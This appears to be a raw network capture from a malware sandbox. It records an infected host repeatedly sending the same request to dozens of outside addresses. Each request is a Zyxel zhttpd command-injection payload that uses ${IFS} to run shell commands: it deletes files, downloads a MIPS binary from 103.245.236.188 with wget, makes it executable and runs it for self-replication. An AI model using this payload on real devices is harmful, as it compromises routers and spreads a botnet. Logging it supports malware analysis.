                                                Jan 12, 2024 18:16:31.646786928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6521192.168.2.235552812.160.98.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646825075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6522192.168.2.235702245.164.233.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646864891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6523192.168.2.2340854219.105.219.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646888018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6524192.168.2.2338638100.219.15.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646943092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6525192.168.2.233517038.52.176.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647000074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6526192.168.2.2358104174.157.246.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647017956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6527192.168.2.2354414116.134.119.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647033930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6528192.168.2.235683852.59.4.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647098064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6529192.168.2.235821437.135.141.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647118092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6530192.168.2.2343944206.64.132.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647171021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6531192.168.2.233561837.164.67.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647201061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6532192.168.2.2354484101.89.232.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647228003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6533192.168.2.2360014181.222.7.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647280931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6534192.168.2.2336506202.106.5.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647320986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6535192.168.2.235430894.131.26.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647372961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6536192.168.2.2356176113.45.51.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647392035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6537192.168.2.2335176130.188.79.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647444010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6538192.168.2.235638671.84.147.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647483110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6539192.168.2.235448260.48.29.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647515059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6540192.168.2.2360956136.0.70.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647542953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6541192.168.2.2343330202.40.182.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647599936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6542192.168.2.234920274.247.80.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647666931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6543192.168.2.2359792106.53.253.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647696018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6544192.168.2.2358118102.185.53.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647715092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6545192.168.2.233554893.231.105.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647757053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6546192.168.2.2360144213.23.165.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647795916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6547192.168.2.2345540144.46.255.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647835016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6548192.168.2.2351646170.159.214.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647866964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6549192.168.2.234684495.174.185.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647923946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6550192.168.2.2351060188.230.145.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.647942066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6551192.168.2.2338160213.18.120.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648022890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6552192.168.2.2338612209.216.97.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648052931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6553192.168.2.2338546196.177.65.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648082972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6554192.168.2.2350928152.230.204.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648129940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6555192.168.2.2351650145.67.106.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648195982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6556192.168.2.2360072160.248.2.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648243904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6557192.168.2.2354958212.133.14.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648282051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6558192.168.2.234693842.109.10.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648320913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6559192.168.2.2347290169.228.118.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648344994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6560192.168.2.235039265.32.49.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648379087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6561192.168.2.2333768155.133.75.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648447037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6562192.168.2.2343282157.53.49.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648473978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6563192.168.2.2353296131.127.210.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648528099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6564192.168.2.2359702122.165.100.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648556948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6565192.168.2.2336638221.7.92.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648607016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6566192.168.2.234737278.135.74.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648636103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6567192.168.2.234807481.73.80.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648685932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6568192.168.2.2339372144.107.105.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648716927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6569192.168.2.2346506208.164.173.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648758888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6570192.168.2.23456425.178.206.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648813963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6571192.168.2.2351434162.214.116.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648864985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6572192.168.2.2348394151.85.200.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648890972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6573192.168.2.235006243.140.16.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648945093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6574192.168.2.2337236107.65.28.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.648993015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6575192.168.2.2335494103.241.223.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649035931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6576192.168.2.2358366140.82.177.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649075985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6577192.168.2.235539842.221.39.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649127960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6578192.168.2.233754876.219.70.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649148941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6579192.168.2.234382217.67.226.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649179935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6580192.168.2.2347282184.211.245.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649234056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6581192.168.2.2359562109.130.246.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649271011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6582192.168.2.234369468.10.197.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649317026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6583192.168.2.2346034205.215.120.109443
                                                TimestampBytes transferredDirectionData
